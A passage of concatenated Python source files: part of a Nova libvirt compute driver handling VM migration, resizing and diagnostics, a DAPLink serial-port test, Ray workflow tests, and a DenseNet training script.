libvirt_utils.file_open(console_file, 'a').close()
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance_ref)
# Establishing connection to volume server.
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(CONF.libvirt_type,
disk_dev),
'type': 'disk',
}
self.volume_driver_method('connect_volume',
connection_info,
disk_info)
# We call plug_vifs before the compute manager calls
# ensure_filtering_rules_for_instance, to ensure bridge is set up
# Retry operation is necessary because continuously request comes,
# concorrent request occurs to iptables, then it complains.
max_retry = CONF.live_migration_retry_count
for cnt in range(max_retry):
try:
self.plug_vifs(instance_ref, network_info)
break
except exception.ProcessExecutionError:
if cnt == max_retry - 1:
raise
else:
LOG.warn(_("plug_vifs() failed %(cnt)d."
"Retry up to %(max_retry)d for %(hostname)s.")
% locals())
greenthread.sleep(1)
def pre_block_migration(self, ctxt, instance, disk_info_json):
"""Preparation for block migration."""
# NOTE (rmk): When preparing for a block migration, the instance dir
# should not exist on the destination hypervisor.
instance_dir = libvirt_utils.get_instance_path(instance)
if os.path.exists(instance_dir):
raise exception.DestinationDiskExists(path=instance_dir)
os.mkdir(instance_dir)
self._create_images_and_backing(ctxt, instance, disk_info_json)
def _create_images_and_backing(self, ctxt, instance, disk_info_json):
"""
:params ctxt: security context
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params disk_info_json:
json strings specified in get_instance_disk_info
"""
disk_info = jsonutils.loads(disk_info_json)
instance_dir = libvirt_utils.get_instance_path(instance)
for info in disk_info:
base = os.path.basename(info['path'])
# Get image type and create empty disk image, and
# create backing file in case of qcow2.
instance_disk = os.path.join(instance_dir, base)
if not info['backing_file'] and not os.path.exists(instance_disk):
libvirt_utils.create_image(info['type'], instance_disk,
info['disk_size'])
else:
# Creating backing file follows same way as spawning instances.
cache_name = os.path.basename(info['backing_file'])
# Remove any size tags which the cache manages
cache_name = cache_name.split('_')[0]
image = self.image_backend.image(instance,
instance_disk,
CONF.libvirt_images_type)
image.cache(fetch_func=libvirt_utils.fetch_image,
context=ctxt,
filename=cache_name,
image_id=instance['image_ref'],
user_id=instance['user_id'],
project_id=instance['project_id'],
size=info['virt_disk_size'])
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(ctxt, instance)
def post_live_migration_at_destination(self, ctxt,
instance_ref,
network_info,
block_migration,
block_device_info=None):
"""Post operation of live migration at destination host.
:param ctxt: security context
:param instance_ref:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param network_info: instance network information
:param block_migration: if true, post operation of block_migraiton.
"""
# Define migrated instance, otherwise, suspend/destroy does not work.
dom_list = self._conn.listDefinedDomains()
if instance_ref["name"] not in dom_list:
# In case of block migration, destination does not have
# libvirt.xml
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance_ref)
self.to_xml(instance_ref, network_info, disk_info,
block_device_info, write_to_disk=True)
# libvirt.xml should be made by to_xml(), but libvirt
# does not accept to_xml() result, since uuid is not
# included in to_xml() result.
dom = self._lookup_by_name(instance_ref["name"])
self._conn.defineXML(dom.XMLDesc(0))
def get_instance_disk_info(self, instance_name, xml=None):
"""Preparation block migration.
:params instance_ref:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:return:
json strings with below format::
"[{'path':'disk', 'type':'raw',
'virt_disk_size':'10737418240',
'backing_file':'backing_file',
'disk_size':'83886080'},...]"
"""
# NOTE (rmk): Passing the domain XML into this function is optional.
# When it is not passed, we attempt to extract it from
# the pre-existing definition.
if xml is None:
try:
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
msg = _("Error from libvirt while getting description of "
"%(instance_name)s: [Error Code %(error_code)s] "
"%(ex)s") % locals()
LOG.warn(msg)
raise exception.InstanceNotFound(instance_id=instance_name)
disk_info = []
doc = etree.fromstring(xml)
disk_nodes = doc.findall('.//devices/disk')
path_nodes = doc.findall('.//devices/disk/source')
driver_nodes = doc.findall('.//devices/disk/driver')
for cnt, path_node in enumerate(path_nodes):
disk_type = disk_nodes[cnt].get('type')
path = path_node.get('file')
if disk_type != 'file':
LOG.debug(_('skipping %(path)s since it looks like volume') %
locals())
continue
# get the real disk size or
# raise a localized error if image is unavailable
dk_size = int(os.path.getsize(path))
disk_type = driver_nodes[cnt].get('type')
if disk_type == "qcow2":
backing_file = libvirt_utils.get_disk_backing_file(path)
virt_size = disk.get_disk_size(path)
else:
backing_file = ""
virt_size = 0
disk_info.append({'type': disk_type,
'path': path,
'virt_disk_size': virt_size,
'backing_file': backing_file,
'disk_size': dk_size})
return jsonutils.dumps(disk_info)
def get_disk_over_committed_size_total(self):
"""Return total over committed disk size for all instances."""
# Disk size that all instance uses : virtual_size - disk_size
instances_name = self.list_instances()
disk_over_committed_size = 0
for i_name in instances_name:
try:
disk_infos = jsonutils.loads(
self.get_instance_disk_info(i_name))
for info in disk_infos:
i_vt_sz = int(info['virt_disk_size'])
i_dk_sz = int(info['disk_size'])
disk_over_committed_size += i_vt_sz - i_dk_sz
except OSError as e:
if e.errno == errno.ENOENT:
LOG.error(_("Getting disk size of %(i_name)s: %(e)s") %
locals())
else:
raise
except exception.InstanceNotFound:
# Instance was deleted during the check so ignore it
pass
# NOTE(gtt116): give change to do other task.
greenthread.sleep(0)
return disk_over_committed_size
def unfilter_instance(self, instance_ref, network_info):
"""See comments of same method in firewall_driver."""
self.firewall_driver.unfilter_instance(instance_ref,
network_info=network_info)
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
If 'refresh' is True, run update the stats first."""
return self.host_state.get_host_stats(refresh=refresh)
def get_host_uptime(self, host):
"""Returns the result of calling "uptime"."""
#NOTE(dprince): host seems to be ignored for this call and in
# other compute drivers as well. Perhaps we should remove it?
out, err = utils.execute('env', 'LANG=C', 'uptime')
return out
def manage_image_cache(self, context, all_instances):
"""Manage the local cache of images."""
self.image_cache_manager.verify_base_images(context, all_instances)
def _cleanup_remote_migration(self, dest, inst_base, inst_base_resize):
"""Used only for cleanup in case migrate_disk_and_power_off fails."""
try:
if os.path.exists(inst_base_resize):
utils.execute('rm', '-rf', inst_base)
utils.execute('mv', inst_base_resize, inst_base)
utils.execute('ssh', dest, 'rm', '-rf', inst_base)
except Exception:
pass
def migrate_disk_and_power_off(self, context, instance, dest,
instance_type, network_info,
block_device_info=None):
LOG.debug(_("Starting migrate_disk_and_power_off"),
instance=instance)
disk_info_text = self.get_instance_disk_info(instance['name'])
disk_info = jsonutils.loads(disk_info_text)
self.power_off(instance)
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
# copy disks to destination
# rename instance dir to +_resize at first for using
# shared storage for instance dir (eg. NFS).
same_host = (dest == self.get_host_ip_addr())
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
try:
utils.execute('mv', inst_base, inst_base_resize)
if same_host:
dest = None
utils.execute('mkdir', '-p', inst_base)
else:
utils.execute('ssh', dest, 'mkdir', '-p', inst_base)
for info in disk_info:
# assume inst_base == dirname(info['path'])
img_path = info['path']
fname = os.path.basename(img_path)
from_path = os.path.join(inst_base_resize, fname)
if info['type'] == 'qcow2' and info['backing_file']:
tmp_path = from_path + "_rbase"
# merge backing file
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'qcow2', from_path, tmp_path)
if same_host:
utils.execute('mv', tmp_path, img_path)
else:
libvirt_utils.copy_image(tmp_path, img_path, host=dest)
utils.execute('rm', '-f', tmp_path)
else: # raw or qcow2 with no backing file
libvirt_utils.copy_image(from_path, img_path, host=dest)
except Exception:
with excutils.save_and_reraise_exception():
self._cleanup_remote_migration(dest, inst_base,
inst_base_resize)
return disk_info_text
def _wait_for_running(self, instance):
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance running successfully."), instance=instance)
raise utils.LoopingCallDone()
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None):
LOG.debug(_("Starting finish_migration"), instance=instance)
# resize disks. only "disk" and "disk.local" are necessary.
disk_info = jsonutils.loads(disk_info)
for info in disk_info:
fname = os.path.basename(info['path'])
if fname == 'disk':
size = instance['root_gb']
elif fname == 'disk.local':
size = instance['ephemeral_gb']
else:
size = 0
size *= 1024 * 1024 * 1024
# If we have a non partitioned image that we can extend
# then ensure we're in 'raw' format so we can extend file system.
fmt = info['type']
if (size and fmt == 'qcow2' and
disk.can_resize_fs(info['path'], size, use_cow=True)):
path_raw = info['path'] + '_raw'
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'raw', info['path'], path_raw)
utils.execute('mv', path_raw, info['path'])
fmt = 'raw'
if size:
disk.extend(info['path'], size)
if fmt == 'raw' and CONF.use_cow_images:
# back to qcow2 (no backing_file though) so that snapshot
# will be available
path_qcow = info['path'] + '_qcow'
utils.execute('qemu-img', 'convert', '-f', 'raw',
'-O', 'qcow2', info['path'], path_qcow)
utils.execute('mv', path_qcow, info['path'])
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info,
image_meta)
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info)
# assume _create_image do nothing if a target file exists.
# TODO(oda): injecting files is not necessary
self._create_image(context, instance, xml,
disk_mapping=disk_info['mapping'],
network_info=network_info,
block_device_info=None)
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
timer = utils.FixedIntervalLoopingCall(self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def _cleanup_failed_migration(self, inst_base):
"""Make sure that a failed migrate doesn't prevent us from rolling
back in a revert."""
shutil.rmtree(inst_base)
def finish_revert_migration(self, instance, network_info,
block_device_info=None):
LOG.debug(_("Starting finish_revert_migration"),
instance=instance)
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
# NOTE(danms): if we're recovering from a failed migration,
# make sure we don't have a left-over same-host base directory
# that would conflict. Also, don't fail on the rename if the
# failure happened early.
if os.path.exists(inst_base_resize):
if os.path.exists(inst_base):
self._cleanup_failed_migration(inst_base)
utils.execute('mv', inst_base_resize, inst_base)
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info)
self._create_domain_and_network(xml, instance, network_info,
block_device_info)
timer = utils.FixedIntervalLoopingCall(self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
self._cleanup_resize(instance, network_info)
def get_diagnostics(self, instance):
def get_io_devices(xml_doc):
"""get the list of io devices from the xml document."""
result = {"volumes": [], "ifaces": []}
try:
doc = etree.fromstring(xml_doc)
except Exception:
return result
blocks = [('./devices/disk', 'volumes'),
('./devices/interface', 'ifaces')]
for block, key in blocks:
section = doc.findall(block)
for node in section:
for child in node.getchildren():
if child.tag == 'target' and child.get('dev'):
result[key].append(child.get('dev'))
return result
domain = self._lookup_by_name(instance['name'])
output = {}
# get cpu time, might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
cputime = domain.vcpus()[0]
for i in range(len(cputime)):
output["cpu" + str(i) + "_time"] = cputime[i][2]
except libvirt.libvirtError:
pass
# get io status
xml = domain.XMLDesc(0)
dom_io = get_io_devices(xml)
for disk in dom_io["volumes"]:
try:
# blockStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.blockStats(disk)
output[disk + "_read_req"] = stats[0]
output[disk + "_read"] = stats[1]
output[disk + "_write_req"] = stats[2]
output[disk + "_write"] = stats[3]
output[disk + "_errors"] = stats[4]
except libvirt.libvirtError:
pass
for interface in dom_io["ifaces"]:
try:
# interfaceStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.interfaceStats(interface)
output[interface + "_rx"] = stats[0]
output[interface + "_rx_packets"] = stats[1]
output[interface + "_rx_errors"] = stats[2]
output[interface + "_rx_drop"] = stats[3]
output[interface + "_tx"] = stats[4]
output[interface + "_tx_packets"] = stats[5]
output[interface + "_tx_errors"] = stats[6]
output[interface + "_tx_drop"] = stats[7]
except libvirt.libvirtError:
pass
output["memory"] = domain.maxMemory()
# memoryStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
mem = domain.memoryStats()
for key in mem.keys():
output["memory-" + key] = mem[key]
except (libvirt.libvirtError, AttributeError):
pass
return output
def add_to_aggregate(self, context, aggregate, host, **kwargs):
"""Add a compute host to an aggregate."""
#NOTE(jogo) Currently only used for XenAPI-Pool
pass
def remove_from_aggregate(self, context, aggregate, host, **kwargs):
"""Remove a compute host from an aggregate."""
pass
def undo_aggregate_operation(self, context, op, aggregate,
host, set_error=True):
"""only used for Resource Pools."""
pass
def instance_on_disk(self, instance):
# ensure directories exist and are writable
instance_path = libvirt_utils.get_instance_path(instance)
LOG.debug(_('Checking instance files accessability'
'%(instance_path)s')
% locals())
return os.access(instance_path, os.W_OK)
def inject_network_info(self, instance, nw_info):
self.firewall_driver.setup_basic_filtering(instance, nw_info)
class HostState(object):
"""Manages information about the compute node through libvirt."""
def __init__(self, driver):
super(HostState, self).__init__()
self._stats = {}
self.driver = driver
self.update_status()
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
If 'refresh' is True, run update the stats first."""
if refresh:
self.update_status()
return self._stats
def update_status(self):
"""Retrieve status info from libvirt."""
LOG.debug(_("Updating host stats"))
data = {}
data["vcpus"] = self.driver.get_vcpu_total()
data["vcpus_used"] = self.driver.get_vcpu_used()
data["cpu_info"] = jsonutils.loads(self.driver.get_cpu_info())
disk_info_dict = self.driver.get_local_gb_info()
data["disk_total"] = disk_info_dict['total']
data["disk_used"] = disk_info_dict['used']
data["disk_available"] = disk_info_dict['free']
data["host_memory_total"] = self.driver.get_memory_mb_total()
data["host_memory_free"] = (data["host_memory_total"] -
self.driver.get_memory_mb_used())
data["hypervisor_type"] = self.driver.get_hypervisor_type()
data["hypervisor_version"] = self.driver.get_hypervisor_version()
data["hypervisor_hostname"] = self.driver.get_hypervisor_hostname()
data["supported_instances"] = \
self.driver.get_instance_capabilities()
self._stats = data
return data
|
serial_test.py
|
#
# DAPLink Interface Firmware
# Copyright (c) 2009-2016, ARM Limited, All Rights Reserved
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
from __future__ import division
import Queue
import functools
import serial
import threading
import time
ERROR_TIMEOUT_SECONDS = 10.0
def _same(d1, d2):
d1 = bytearray(d1)
d2 = bytearray(d2)
for i in range(min(len(d1), len(d2))):
if d1[i] != d2[i]:
return False
if len(d1) != len(d2):
return False
return True
# http://digital.ni.com/public.nsf/allkb/D37754FFA24F7C3F86256706005B9BE7
standard_baud = [
9600,
14400,
19200,
28800,
38400,
#56000, #TODO - uncomment once daplink-validation supports 56000 on nrf5x
57600,
115200,
]
timing_test_baud = standard_baud[3:]
def calc_timeout(length, baud):
"""Calculate a timeout given the data and baudrate
Positional arguments:
length - size of data to be sent
baud - baud rate to send data
Calculate a reasonable timeout given the supplied parameters.
This function adds slightly more time then is needed, to accont
for latency and various configurations.
"""
return 12 * float(length) / float(baud) + 0.2
class SerialTester(object):
"""Helper object to buffer serial and setup baud"""
def __init__(self, port):
self.raw_serial = serial.Serial(port=port,bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=None, xonxoff=False, rtscts=False, write_timeout=None, dsrdtr=False, inter_byte_timeout=None, exclusive=None)
self.raw_serial.write_timeout = ERROR_TIMEOUT_SECONDS
self._queue = Queue.Queue()
self._write_thread = threading.Thread(target=self._serial_main)
self._write_thread.start()
def __enter__(self):
return self
def __exit__(self, exception_type, value, traceback):
self._queue.put(None)
self._write_thread.join(ERROR_TIMEOUT_SECONDS)
assert not self._write_thread.isAlive(), "Thread join failed"
self.raw_serial.close()
self.raw_serial = None
return False
def new_session_with_baud(self, baud, parent_test):
"""Start a new session by restarting target and setting baud"""
test_info = parent_test.create_subtest("Set Baud")
# Set baud to 115200
self.raw_serial.baudrate = 115200
self.raw_serial.timeout = 1.0
# Reset the target
self.raw_serial.reset_output_buffer()
self.raw_serial.reset_input_buffer()
self.raw_serial.sendBreak()
# Wait until the target is initialized
expected_resp = "{init}"
resp = self.read(len(expected_resp))
if not _same(resp, expected_resp):
test_info.failure("Fail on init: %s" % resp)
return False
# Change baudrate to that of the first test
command = "{baud:%i}" % baud
self.write(command)
resp = self.read(len(command))
if not _same(resp, command):
test_info.failure("Fail on baud command: %s" % resp)
return False
# Update baud of local serial port
self.raw_serial.baudrate = baud
# Read the response indicating that the baudrate
# on the target has changed
expected_resp = "{change}"
resp = self.read(len(expected_resp))
if not _same(resp, expected_resp):
test_info.failure("Fail on baud change %s" % resp)
return False
# Set default timeout
self.raw_serial.timeout = ERROR_TIMEOUT_SECONDS
# Success
return True
def read(self, length):
"""Read serial data"""
return self.raw_serial.read(length)
def write(self, data):
"""Write serial port data in the background"""
func = functools.partial(self.raw_serial.write, data[:])
self._queue.put(func)
def set_read_timeout(self, timeout):
"""Set timeout for read operations"""
assert self._queue.empty(), "Queue must be empty to change timeout"
self.raw_serial.timeout = timeout
def flush(self):
"""Wait for all writes to complete"""
self._queue.join()
assert self._queue.empty()
def _serial_main(self):
"""Write helper thread"""
while True:
task = self._queue.get(True)
if task is None:
self._queue.task_done()
# End of processing is an empty task
break
try:
task()
except serial.SerialTimeoutException:
pass
self._queue.task_done()
def test_serial(workspace, parent_test):
"""Test the serial port endpoint
Requirements:
-daplink-validation must be loaded for the target.
Positional arguments:
port - the serial port to open as a string
Return:
True if the test passed, False otherwise
"""
test_info = parent_test.create_subtest("Serial test")
board = workspace.board
port = board.get_serial_port()
test_info.info("Testing serial port %s" % port)
# Note: OSX sends a break command when a serial port is closed.
# To avoid problems while testing keep the serial port open the
# whole time. Use the property 'baudrate' to change the baud
# instead of opening a new instance.
with SerialTester(port) as sp:
# Generate a 4KB block of dummy data
# and test supported baud rates
test_data = [i for i in range(0, 256)] * 4 * 4
test_data = str(bytearray(test_data))
for baud in standard_baud:
test_info.info("Testing baud %i" % baud)
success = sp.new_session_with_baud(baud, test_info)
if not success:
test_info.failure("Unable to setup session")
continue
# Perform test
sp.write(test_data)
resp = sp.read(len(test_data))
resp = bytearray(resp)
if _same(test_data, resp):
test_info.info("Pass")
else:
test_info.failure("Fail on baud %s" % baud)
# Timing stress test - send data at critical points
# in time like right as the transmitter is turned off
# ------------------
# Test sequence
# 1. Send a block of data (vary size for the test)
# 2. Wait until 1 byte is read back
# 3. Write 1 byte
# 4. Read back all data
test_data = [i for i in range(0, 256)] * 4 * 4
test_data = str(bytearray(test_data))
for baud in timing_test_baud:
test_info.info("Timing test baud %i" % baud)
success = sp.new_session_with_baud(baud, test_info)
if not success:
test_info.failure("Unable to setup session")
continue
test_pass = True
for data_size in range(1, 10):
data = test_data[0:data_size + 1]
for _ in range(0, 1000):
resp = bytearray()
sp.write(data[0:data_size])
resp += sp.read(1)
sp.write(data[-1:])
resp += sp.read(data_size)
sp.flush()
if not _same(data, resp):
test_pass = False
test_info.info("fail size - %s" % data_size)
break
if test_pass:
test_info.info("Pass")
else:
test_info.failure("Fail on timing test with baud %s"
% baud)
# Setting change smoke test - reconfigure settings while
# in the middle of a transfer and verify nothing bad
test_data = [i for i in range(0, 128)]
test_data = str(bytearray(test_data))
sp.new_session_with_baud(115200, test_info)
sp.set_read_timeout(0)
for baud in standard_baud:
sp.raw_serial.baudrate = baud
sp.write(test_data)
xfer_time = float(len(test_data) * 10) / float(baud)
time.sleep(xfer_time / 2)
# Discard data
sp.read(1024)
# Read any leftover data
sp.flush()
sp.raw_serial.baudrate = 115200
sp.set_read_timeout(1.0)
sp.read(128 * len(standard_baud))
# Generate a 8 KB block of dummy data
# and test a large block transfer
test_data = [i for i in range(0, 256)] * 4 * 8
test_data = str(bytearray(test_data))
sp.new_session_with_baud(115200, test_info)
sp.write(test_data)
resp = sp.read(len(test_data))
if _same(resp, test_data):
test_info.info("Block test passed")
else:
test_info.failure("Block test failed")
# Refresh to check for asserts
board.refresh(test_info)
|
test_basic_workflows_3.py
|
import pytest
from filelock import FileLock
from pathlib import Path
import ray
from ray import workflow
from ray.tests.conftest import * # noqa
def test_wf_run(workflow_start_regular, tmp_path):
counter = tmp_path / "counter"
counter.write_text("0")
@ray.remote
def f():
v = int(counter.read_text()) + 1
counter.write_text(str(v))
workflow.create(f.bind()).run("abc")
assert counter.read_text() == "1"
# This will not rerun the job from beginning
workflow.create(f.bind()).run("abc")
assert counter.read_text() == "1"
def test_wf_no_run():
# workflow should be able to run without explicit init
ray.shutdown()
@ray.remote
def f1():
pass
f1.bind()
@ray.remote
def f2(*w):
pass
f = workflow.create(f2.bind(*[f1.bind() for _ in range(10)]))
f.run()
def test_dedupe_indirect(workflow_start_regular, tmp_path):
counter = Path(tmp_path) / "counter.txt"
lock = Path(tmp_path) / "lock.txt"
counter.write_text("0")
@ray.remote
def incr():
with FileLock(str(lock)):
c = int(counter.read_text())
c += 1
counter.write_text(f"{c}")
@ray.remote
def identity(a):
return a
@ray.remote
def join(*a):
return counter.read_text()
# Here a is passed to two steps and we need to ensure
# it's only executed once
a = incr.bind()
i1 = identity.bind(a)
i2 = identity.bind(a)
assert "1" == workflow.create(join.bind(i1, i2)).run()
assert "2" == workflow.create(join.bind(i1, i2)).run()
# pass a multiple times
assert "3" == workflow.create(join.bind(a, a, a, a)).run()
assert "4" == workflow.create(join.bind(a, a, a, a)).run()
def test_run_off_main_thread(workflow_start_regular):
@ray.remote
def fake_data(num: int):
return list(range(num))
succ = False
# Start new thread here ⚠️
def run():
global succ
# Setup the workflow.
data = workflow.create(fake_data.bind(10))
assert data.run(workflow_id="run") == list(range(10))
import threading
t = threading.Thread(target=run)
t.start()
t.join()
assert workflow.get_status("run") == workflow.SUCCESSFUL
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
|
train_test.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Trains and tests a DenseNet on CIFAR-10.
For usage information, call with --help.
Author: Jan Schlüter
"""
import os
from argparse import ArgumentParser
from functions_0 import *
def opts_parser():
usage = "Trains and tests a DenseNet on CIFAR-10."
parser = ArgumentParser(description=usage)
parser.add_argument(
'-L', '--depth', type=int, default=40,
help='Network depth in layers (default: %(default)s)')
parser.add_argument(
'-k', '--growth-rate', type=int, default=12,
help='Growth rate in dense blocks (default: %(default)s)')
parser.add_argument(
'--dropout', type=float, default=0,
help='Dropout rate (default: %(default)s)')
parser.add_argument(
'--augment', action='store_true', default=True,
help='Perform data augmentation (enabled by default)')
parser.add_argument(
'--no-augment', action='store_false', dest='augment',
help='Disable data augmentation')
parser.add_argument(
'--validate', action='store_true', default=False,
help='Perform validation on validation set (disabled by default)')
parser.add_argument(
'--no-validate', action='store_false', dest='validate',
help='Disable validation')
parser.add_argument(
'--validate-test', action='store_const', dest='validate',
const='test', help='Perform validation on test set')
parser.add_argument(
'--epochs', type=int, default=300,
help='Number of training epochs (default: %(default)s)')
parser.add_argument(
'--eta', type=float, default=0.1,
help='Initial learning rate (default: %(default)s)')
parser.add_argument(
'--save-weights', type=str, default=None, metavar='FILE',
help='If given, save network weights to given .npz file')
parser.add_argument(
'--save-errors', type=str, default=None, metavar='FILE',
help='If given, save train/validation errors to given .npz file')
return parser
def generate_in_background(generator, num_cached=10):
"""
Runs a generator in a background thread, caching up to `num_cached` items.
"""
import Queue
queue = Queue.Queue(maxsize=num_cached)
sentinel = object() # guaranteed unique reference
# define producer (putting items into queue)
def producer():
for item in generator:
queue.put(item)
queue.put(sentinel)
# start producer (in a background thread)
import threading
thread = threading.Thread(target=producer)
thread.daemon = True
thread.start()
# run as consumer (read items from queue, in current thread)
item = queue.get()
while item is not sentinel:
yield item
item = queue.get()
def train_test(depth, growth_rate, dropout, augment, validate, epochs,
eta, save_weights, save_errors, batchsize=64):
# import (deferred until now to make --help faster)
import numpy as np
import theano
import theano.tensor as T
import lasagne
import densenet as densenet # or "import densenet" for slower version
import cifar10
import progress
seed = 42
draw_flag = True
np.random.seed(seed)
# Logging operations
output_path = '/results/' + os.getcwd().split('/')[-1] + '/' + os.path.basename(__file__).split('.')[0] + '/' + time.strftime(
"%d-%m-%Y_") + time.strftime("%H:%M:%S") + '/'
pyscript_name = os.path.basename(__file__)
create_result_dirs(output_path, pyscript_name)
sys.stdout = Logger(output_path)
print('seed: ', seed)
# instantiate network
print("Instantiating network...")
input_var = T.tensor4('inputs')
target_var = T.ivector('targets')
network = densenet.build_densenet(input_var=input_var, depth=depth,
growth_rate=growth_rate, dropout=dropout)
if draw_flag:
draw_to_file(network, output_path, list_flag=False)
draw_to_file(network, output_path, list_flag=False)
print("%d layers with weights, %d parameters" %
(sum(hasattr(l, 'W')
for l in lasagne.layers.get_all_layers(network)),
lasagne.layers.count_params(network, trainable=True)))
# load dataset
print("Loading dataset...")
val_size = 5000
num_labeled_data = 100
# X, y, X_test, y_test = cifar10.load_dataset(
# path=os.path.join(os.path.dirname(__file__), 'data'))
print("Loading dataset...")
dataset = 'MNIST-test'
X_test, y_test = load_dataset(dataset)
dataset = 'MNIST-train'
X, y = load_dataset(dataset)
X, X_test = normalize(X, X_test, '[-1, -1]')
X, X_test = pad_data(X, X_test, 32)
num_data = X.shape[0]
if validate == 'test':
X_val, y_val = X_test, y_test
elif validate:
X_val, y_val = X[-5000:], y[-5000:]
X_train, y_train = X[:-5000], y[:-5000]
# X_train, X_val, y_train, y_val = balanced_subsample(X_train, y_train, subsample_size=10000)
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=val_size, random_state=seed,
stratify=y)
semi_supervised_flag = False
semi_supervised_idx = None
if num_labeled_data < num_data:
semi_supervised_flag = True
semi_supervised_idx = np.int32(np.zeros(num_data))
# X_unlabeled, X_labeled, y_unlabeled, y_labeled, indices = balanced_subsample(X_train, y_train, subsample_size=num_labeled_data, shuffle_flag=False)
_, _, _, _, indices = balanced_subsample(X_train, y_train, subsample_size=num_labeled_data,
shuffle_flag=False)
semi_supervised_idx[indices] = 1
X = np.concatenate((X_train, X_val), axis=0)
y = np.concatenate((y_train, y_val), axis=0)
X = X[indices]
y = y[indices]
# define training function
print("Compiling training function...")
prediction = lasagne.layers.get_output(network)
prediction_clean = lasagne.layers.get_output(network, deterministic=True)
# note: The Keras implementation clips predictions for the categorical
# cross-entropy. This doesn't seem to have a positive effect here.
# prediction = T.clip(prediction, 1e-7, 1 - 1e-7)
loss = lasagne.objectives.categorical_crossentropy(prediction,
target_var).mean()
# loss_squared = lambda_clean * lasagne.objectives.squared_error(prediction, prediction_clean).mean()
# note: The paper says 1e-4 decay, but 1e-4 in Torch is 5e-5 elsewhere.
# However, 1e-4 seems to work better than 5e-5, so we use 1e-4.
# note: Torch includes biases in L2 decay. This seems to be important! So
# we decay all 'trainable' parameters, not just 'regularizable' ones.
l2_loss = 6e-4 * lasagne.regularization.regularize_network_params(
network, lasagne.regularization.l2, {'trainable': True})
params = lasagne.layers.get_all_params(network, trainable=True)
eta = theano.shared(lasagne.utils.floatX(eta), name='eta')
updates = lasagne.updates.nesterov_momentum(
loss + l2_loss, params, learning_rate=eta, momentum=0.9)
train_fn = theano.function([input_var, target_var], loss, updates=updates)
l2_fn = theano.function([], l2_loss)
# define validation/testing function
print("Compiling testing function...")
test_loss = lasagne.objectives.categorical_crossentropy(prediction_clean,
target_var).mean()
test_err = 1 - lasagne.objectives.categorical_accuracy(prediction_clean,
target_var).mean(
dtype=theano.config.floatX)
test_fn = theano.function([input_var, target_var], [test_loss, test_err])
# Finally, launch the training loop.
print("Starting training...")
if save_errors:
errors = []
for epoch in range(epochs):
# shrink learning rate at 50% and 75% into training
if epoch == (epochs // 2) or epoch == (epochs * 3 // 4):
eta.set_value(eta.get_value() * lasagne.utils.floatX(0.1))
# if (epoch == (120)) or (epoch == (210)) or (epoch == (270)):
# eta.set_value(eta.get_value() * lasagne.utils.floatX(0.2))
# In each epoch, we do a full pass over the training data:
train_loss = 0
# clean_loss = 0
train_batches = len(X) // batchsize
batches = cifar10.iterate_minibatches(X, y, batchsize,
shuffle=True)
if augment:
batches = cifar10.augment_minibatches(batches)
batches = generate_in_background(batches)
batches = progress.progress(
batches, desc='Epoch %d/%d, Batch ' % (epoch + 1, epochs),
total=train_batches)
for inputs, targets in batches:
tr_loss = train_fn(inputs, targets)
train_loss += tr_loss
# clean_loss += cl_loss
# And possibly a full pass over the validation data:
if validate:
val_loss = 0
val_err = 0
val_batches = len(X_val) // batchsize
for inputs, targets in cifar10.iterate_minibatches(X_val, y_val,
batchsize,
shuffle=False):
loss, err = test_fn(inputs, targets)
val_loss += loss
val_err += err
# Then we print the results for this epoch:
train_loss /= train_batches
l2_loss = l2_fn()
print(" training loss:\t%.6f" % train_loss)
# print(" clean loss: \t%.6f" % clean_loss)
print(" L2 loss: \t%.6f" % l2_loss)
